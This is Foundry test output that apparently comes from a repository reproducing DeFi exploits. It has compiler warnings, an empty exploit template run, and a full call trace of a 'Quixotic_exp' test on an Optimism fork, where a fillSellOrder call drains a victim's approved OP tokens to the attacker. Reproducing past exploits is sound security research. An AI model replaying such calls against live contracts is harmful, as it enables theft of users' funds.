Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 937.69ms
Solc 0.8.10 finished in 1.48s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 961.13ms (1.72ms CPU time)

Ran 1 test for src/test/2022-07/Quixotic_exp.sol:ContractTest
[PASS] testExploit() (gas: 204588)
Logs:
  Before exploiting, attacker OP Balance:: 199556990343113309559543
  After exploiting, attacker OP Balance:: 202224777417387484709214

Traces:
  [5795] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("optimism", 13591383 [1.359e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [212188] ContractTest::testExploit()
    ├─ [0] VM::prank(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5)
    │   └─ ← [Return]
    ├─ [2952] 0x4200000000000000000000000000000000000042::balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5) [staticcall]
    │   └─ ← [Return] 199556990343113309559543 [1.995e23]
    ├─ emit log_named_uint(key: "Before exploiting, attacker OP Balance:", val: 199556990343113309559543 [1.995e23])
    ├─ [184618] 0x065e8A87b8F11aED6fAcf9447aBe5E8C5D7502b6::fillSellOrder(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, 0xbe81eabDBD437CbA43E4c1c330C63022772C2520, 1, 0, 115792089237316195423570985008687907853269984665640564039457584007913129639934 [1.157e77], 2736191871050436050944 [2.736e21], 1, 115792089237316195423570985008687907853269984665640564039457584007913129639934 [1.157e77], 0x4200000000000000000000000000000000000042, 0x28bc2ff1634b13821eac466ef6875c44f1f556d00d3cafce02da07b217da395131294339d96a01922b83f8e3c67e74652198b3a6db79d7ddd48807b9ec6ae0491c, 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B)
    │   ├─ [2480] 0x445e27A25606DAD4321c7b97eF8350A9585a5c78::isApprovedERC20(0x4200000000000000000000000000000000000042) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   ├─ [2952] 0x4200000000000000000000000000000000000042::balanceOf(0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B) [staticcall]
    │   │   └─ ← [Return] 2736191871050436050944 [2.736e21]
    │   ├─ [3219] 0x4200000000000000000000000000000000000042::allowance(0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, 0x065e8A87b8F11aED6fAcf9447aBe5E8C5D7502b6) [staticcall]
    │   │   └─ ← [Return] 1999995000000000000000000 [1.999e24]
    │   ├─ [2932] 0x522149e80BCEF74DE8592A48a4698E195c38Ad37::getSellOrderCancellationBlockNumber(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, 0xbe81eabDBD437CbA43E4c1c330C63022772C2520, 1) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000cf6355
    │   ├─ [3000] PRECOMPILES::ecrecover(0xe658da3195c766dba0f4c425f8bfd7fe65d5edf91cc94e384147b31d37cbe44d, 28, 18425012081391239162931925442453228685199526912066377066334000025994838817105, 22236234286854537470473841930589841539209013887877441828598411736721908228169) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000a0805082ea0fc8bfdcc6218a986efda6704efe5
    │   ├─ [5818] 0x522149e80BCEF74DE8592A48a4698E195c38Ad37::cancelPreviousSellOrders(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, 0xbe81eabDBD437CbA43E4c1c330C63022772C2520, 1)
    │   │   ├─  storage changes:
    │   │   │   @ 0xa96e8397651abdf92247640f28aa9a6c99b5694b181cd44b32715121407adaa7: 0x0000000000000000000000000000000000000000000000000000000000cf6355 → 0x0000000000000000000000000000000000000000000000000000000000cf6357
    │   │   └─ ← [Stop]
    │   ├─ emit SellOrderFilled(param0: 0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, param1: 0xbe81eabDBD437CbA43E4c1c330C63022772C2520, param2: ECRecover: [0x0000000000000000000000000000000000000001], param3: 442939503929725648205336045945709809613129010555 [4.429e47], param4: 2736191871050436050944 [2.736e21])
    │   ├─ [677] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0x01ffc9a7) [staticcall]
    │   │   └─ ← [Return] true
    │   ├─ [661] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0xffffffff) [staticcall]
    │   │   └─ ← [Return] false
    │   ├─ [687] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0x80ac58cd) [staticcall]
    │   │   └─ ← [Return] false
    │   ├─ [677] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0x01ffc9a7) [staticcall]
    │   │   └─ ← [Return] true
    │   ├─ [661] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0xffffffff) [staticcall]
    │   │   └─ ← [Return] false
    │   ├─ [677] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::supportsInterface(0xd9b67a26) [staticcall]
    │   │   └─ ← [Return] true
    │   ├─ [1283] 0xbe81eabDBD437CbA43E4c1c330C63022772C2520::safeTransferFrom(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, 1, 1, 0x)
    │   │   └─ ← [Stop]
    │   ├─ [2597] 0x40A863955742dD6CFc873a7D69dc85113FA8085F::getRoyaltyPayoutRate(0xbe81eabDBD437CbA43E4c1c330C63022772C2520) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [89233] 0x4200000000000000000000000000000000000042::transferFrom(0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, 0xeC1557A67d4980C948cD473075293204F4D280fd, 68404796776260901273 [6.84e19])
    │   │   ├─ emit Approval(owner: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, spender: 0x065e8A87b8F11aED6fAcf9447aBe5E8C5D7502b6, value: 1999926595203223739098727 [1.999e24])
    │   │   ├─ emit Transfer(from: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, to: 0xeC1557A67d4980C948cD473075293204F4D280fd, value: 68404796776260901273 [6.84e19])
    │   │   ├─ emit DelegateVotesChanged(delegate: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, previousBalance: 2736191871050436050944 [2.736e21], newBalance: 2667787074274175149671 [2.667e21])
    │   │   ├─ emit DelegateVotesChanged(delegate: 0xB1EA5a3E5EA7fA1834d48058EcDa26d8c59e8251, previousBalance: 2604937019090100274783395 [2.604e24], newBalance: 2605005423886876535684668 [2.605e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0da6a0115db8a8c0e85a0d09f62d495696545b04232234fbc000448fb24564d7: 0x000000000000000000000000000000000000000000000094544a49c128ac0000 → 0x0000000000000000000000000000000000000000000000909efba182badae667
    │   │   │   @ 0xfa6bb9100af8e2d8a5aec128bb9744a073cfc8e35f4a8e241e9e9e8be15501ab: 2 → 3
    │   │   │   @ 0x51898ce1c97892743969f1d03cf0c47646d2c812fdc881ab649a37aadfe7e48a: 0 → 0x00000000000000000000000000000000000000909efba182badae66700cf6357
    │   │   │   @ 0x279fb8e21eadca011a206b4e476e88ad9b31da0dfabf42757a6fad8c0dd17c22: 33978 → 33979
    │   │   │   @ 0xbe16a5d8857e81fb3cef28e272b30d727afe66d1019670a4b2545c6377398053: 0x0000000000000000000000000000000000000000000001a7bdf41c7491ca316c → 0x0000000000000000000000000000000000000000000001ab7342c4b2ff9b4b05
    │   │   │   @ 0x57c84d5b90b287c0661d6da85a3e8417c7ae51cbd4e262de018c5532c199b6df: 0 → 0x00000000000000000000000000000000000227a1a082cadaf3effe3c00cf6357
    │   │   │   @ 0x5edee17d9afde49f64b91dcc1c9266037d55e2b6d14294025d9f0f547ad14be7: 0x00000000000000000000000000000000000000000001a783f23a0858fd0c0000 → 0x00000000000000000000000000000000000000000001a7803ceb601a8f3ae667
    │   │   └─ ← [Return] true
    │   ├─ [17052] 0x4200000000000000000000000000000000000042::transferFrom(0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, 0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, 2667787074274175149671 [2.667e21])
    │   │   ├─ emit Approval(owner: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, spender: 0x065e8A87b8F11aED6fAcf9447aBe5E8C5D7502b6, value: 1997258808128949563949056 [1.997e24])
    │   │   ├─ emit Transfer(from: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, to: 0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5, value: 2667787074274175149671 [2.667e21])
    │   │   ├─ emit DelegateVotesChanged(delegate: 0x4D9618239044A2aB2581f0Cc954D28873AFA4D7B, previousBalance: 2667787074274175149671 [2.667e21], newBalance: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x13919925da80894d5c067a2719e3198c169345147908bedc1a9f0efccc4b66e5: 0x000000000000000000000000000000000000000000002a4201914ad01e221af7 → 0x000000000000000000000000000000000000000000002ad2a08cec52d8fd015e
    │   │   │   @ 0x5edee17d9afde49f64b91dcc1c9266037d55e2b6d14294025d9f0f547ad14be7: 0x00000000000000000000000000000000000000000001a7803ceb601a8f3ae667 → 0x00000000000000000000000000000000000000000001a6ef9defbe97d4600000
    │   │   │   @ 0x0da6a0115db8a8c0e85a0d09f62d495696545b04232234fbc000448fb24564d7: 0x0000000000000000000000000000000000000000000000909efba182badae667 → 0
    │   │   │   @ 0x51898ce1c97892743969f1d03cf0c47646d2c812fdc881ab649a37aadfe7e48a: 0x00000000000000000000000000000000000000909efba182badae66700cf6357 → 0x0000000000000000000000000000000000000000000000000000000000cf6357
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [952] 0x4200000000000000000000000000000000000042::balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5) [staticcall]
    │   └─ ← [Return] 202224777417387484709214 [2.022e23]
    ├─ emit log_named_uint(key: "After exploiting, attacker OP Balance:", val: 202224777417387484709214 [2.022e23])
    ├─  storage changes:
    │   @ 1: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 8.16s (6.50s CPU time)

Ran 2 test suites in 9.40s (9.12s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
